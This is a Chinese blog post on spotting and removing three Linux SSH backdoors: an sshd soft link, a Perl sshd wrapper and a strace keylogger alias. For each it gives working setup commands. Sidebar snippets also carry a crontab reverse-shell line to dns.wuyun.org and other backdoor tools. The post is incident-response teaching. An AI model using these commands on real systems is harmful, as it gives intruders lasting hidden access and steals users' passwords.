linux mysql backdoor_Linux SSH Backdoor分析排查

最新推荐文章于 2023-11-09 12:08:15 发布
最新推荐文章于 2023-11-09 12:08:15 发布
阅读量250 收藏
点赞数
文章标签: linux mysql backdoor
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34209060/article/details/113396894
版权

1、SSH后门分类

SSH后门方式有以下几种

软链接

SSH Server wrapper

SSH Keylogger

2、软链接

利用方法

[root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;

排查方法

[root@helen]# netstat -anop

76685ae297f18c12bb2e5402b356ec36.png

通过开发端口信息的PID查询进程路径,【ll /proc/xxxx】命令查看程序对应的路径。

cc51c5e560d38be68e196dd08c798114.png

清除后门

kill -9 pid

rm -rf 后门程序

3、SSH Server wrapper

利用方法

先将/usr/sbin/sshd文件mv到/usr/bin目录

[root@helen ~]# cd /usr/sbin/

[root@helen sbin]# mv sshd ../bin

[root@helen sbin]# vim sshd

再编辑sshd

#!/usr/bin/perl

exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);

exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

再设置权限

chmod 755 sshd

攻击者:

在本机上执行socat STDIO TCP4:target_ip:22,sourceport=19526

cc5aac4752b61d65a78cd1dbefb193e8.png

排查方法

查看端口可以看到网络外链的端口

e644935b5ae7871084199a9ff7aa3f90.png

因为正常的sshd路径是在/usr/sbin/sshd,通过命令【ll /proc/xxx】查看sshd的路径路径在/usr/bin/sshd。所以断定sshd被动过手脚。

通过查看sshd文件可得知sshd的确被动过手脚。

cat /usr/sbin/sshd

清除后门

rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;

4、SSH Keylogger

利用方法

编辑当前用户下的.bashrc文件

vi /root/.bashrc

在最后面添加如下后门代码:

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

【source .bashrc】命令使更改的配置生效

e16ae0f8fd0b50eb3c861ae8c8b6b402.png

ssh连接或者su切换用户,输入密码时的密码,无论错误或者正确都能记录到log里

排查方法

排查环境变量

清除后门

清空增加的环境变量内容

5、参考

阿猴HOSEA
关注
网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 250
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
每天一个运维小知识----(持续更新中)
名猿妮的博客
07-30 553
1.查看某一端口的连接客户端IP,比如80端口: 2.简述/etc/fstab里面个字段的含义 因为 mount 挂载在重启服务器后会失效,所以需要将分区信息写到 /etc/fstab 文件中让它永久挂载: 磁盘分区 挂载目录 文件格式 3.查看当前连接IP地址: netstat -nat 4.查看80端口连接数 netstat -nat|grep -i '80'|...
backdoored-ssh:后门 ssh
07-22
后门 ssh 我只是遵循了这个指南: :
Linux_backdoor
dengzhasong7076的博客
05-13 777
Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;...
查看ssh端口号_权限维持 | SSH软链接后门
weixin_39963819的博客
12-11 460
01 后门命令经典后门:对sshd建立软链接,即可使用任意密码登录。1、创建后门ln -sf /usr/sbin/sshd /路径名/su; /路径名/su -oPort=端口号2、任意密码登ssh 用户名@x.x.x.x -p 端口号02 原理在sshd服务配置启用PAM认证的前提下,PAM配置文件中控制标志为sufficient时,只要pam_rootok模块检测uid为0(root)即可成功...
linux ssh backdoor,Linux Fokirtor Backdoor [新的Linux后门]
weixin_42532473的博客
05-12 263
日前,赛门铁克发布博客称,在五月的一次安全事件中,发现一名******了一个大型物联网托管服务商,并且在内部管理系统上使用了一个有意思的Linux后门 – Fokirtor。经过赛门铁克研究发现,该后门能够伪装它的通信流量,并伪装成正常的SSH通信流量。该后门支持***者运行常用的功能,如执行远程命令、反向链接到C&C服务器,Fokirtor能够监控SSH网络流量,如果检测到流量中存在冒号...
linux mysql backdoor_Mysql BackDoor
weixin_34205814的博客
01-19 123
作者:linx2008 Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过. [安装] 将Mysql.php传到PHP服务器上,依填上相应的H...
Linux应急响应排查脚本
0xff
11-23 958
#!/bin/bash date=$(date +%Y%m%d) ipadd=$(ifconfig -a | grep -w inet | grep -v 127.0.0.1 | awk 'NR==1{print $2}') check_file="/tmp/xxxxx_${ipadd}_${date}/check_file/" danger_file="/tmp/xxxxx_${ipadd}_${date}/danger_file.txt" log_file="/tmp/xxxxx_${ipadd}_${
红队系列-溯源与应急反制专题
aming小老弟
11-09 522
日志分析、流量特征分析、内存马。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4542
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
custom-ssh-backdoor:自定义 ssh 后门,使用 Paramiko 在 python 中编码
07-08
使用 Paramiko 的 SSH 后门 例子:
icmpdoor:用Python 3和Scapy编写的ICMP Reverse Shell(backdoorrev shell)
05-07
icmpdoor-ICMP反向外壳 icmpdoor是用Python3和scapy编写的ICMP rev shell。 已在Ubuntu 20.04,Debian 10(Kali Linux)和Windows 10上进行测试。 Python版本用法(Windows和Linux): ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control) ./icmpdoor.py -i INTERFACE -d CNC-IP (Implant) 二进制Windows版本用法版本: ./icmp-cnc.exe -d VICTIM-IP (Command and Control) ./icmpdoor.exe -d CNC-IP (Implant) 二进制Linux版本使用版本: ./icmp-cnc -d VICTIM-IP (
Exploit - Fortigate SSH Backdoor
Nixawk
01-15 2043
root@Exploit-Fortigate-SSH-Backdoor:~# python fortigate.py 192.168.1.100 DEBUG:paramiko.transport:starting thread (client mode): 0xb6f81e0cL DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-par
ssh后门介绍与防御
有勇气的牛排博客
08-04 1663
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
Linux SSH Backdoor分析排查
weixin_30274627的博客
06-11 762
1、SSH后门分类 SSH后门方式有以下几种 软链接 SSH Server wrapper SSH Keylogger 2、软链接 利用方法 [root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333; 排查方法 [root@helen]# netstat -anop 通过开发端口信息的PID查询进程路径...
linux后门收集
dongmie1999的博客
09-18 673
linux在线模拟器 https://linuxzoo.net/ (gmail注册可用,root权限) 零散的 安全脉搏 https://www.secpulse.com/archives/59674.html(后门利用方法) https://www.secpulse.com/archives/100484.html(后门检测及其清除方法) linux常见backdoor...
OPENSSH - Build a backdoor
Nixawk
03-11 1660
Platforms: CentOS 6.5 x64_x86 OPENSSH 5.3 This is a OPENSSH backdoor patch.diff -u openssh-5.9p1/auth.c openssh-5.9p1_backdoor/auth.c --- openssh-5.9p1/auth.c 2011-05-29 07:40:42.000000000 -0400 ++
linux安装openssh 密码错误,Linux安装openssh的后门补丁
weixin_29885875的博客
04-30 295
相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSSH留后门是入侵者的惯用方式之一,OpenSSh后门比较...
SSH Keylogger密码抓取
The current road is different, love needs to distinguish between right and wrong
11-16 1124
SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。没有那么多天赋异禀,优秀的人总是努力地翻山越岭。
UVM_BACKDOOR是什么
最新发布
12-05
根据提供的引用内容,没有直接回答UVM_BACKDOOR是什么的信息。但是,可以根据引用内容提供一些相关信息。 引用中提到了uvm_bitstream_t,这是UVM中的一种数据类型,用于在UVM组件之间传递数据。而UVM_BACKDOOR是UVM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值